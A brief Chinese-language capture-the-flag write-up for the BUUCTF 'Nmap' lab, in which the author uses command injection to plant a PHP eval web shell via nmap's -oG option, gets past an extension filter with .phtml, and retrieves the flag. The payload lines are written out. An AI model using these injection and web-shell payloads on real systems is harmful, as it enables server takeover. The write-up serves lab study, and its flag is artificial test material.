BUUCTF------Nmap
进入靶场

类似于一个nmap的网站

尝试一下功能
没什么用
看看数据包 既然跟IP相关
伪造一个XXF看看

拼接了一下没什么用 果然没这么简单
尝试一下命令注入
构造payload 127.0.0.1 | ls

应该有过滤 加了个\
直接构造个php木马上传试试
127.0.0.1 | ' <?php @eval($_POST["cmd"]);?> -oG shell.php '


应该被过滤了
也没有什么提示 盲猜是后缀名 mini绕过试试
双写、php3都试过了 最后phtml成功了
127.0.0.1 | ' <?= @eval($_POST["cmd"]);?> -oG shell.phtml '

拼接访问一下成功上传

用蚁剑连接看看
成功连接

接下来就慢慢找flag
在根目录下找到flag

flag{aade295d-204f-476f-91ee-299a5fa993a2}
下播!!!!!
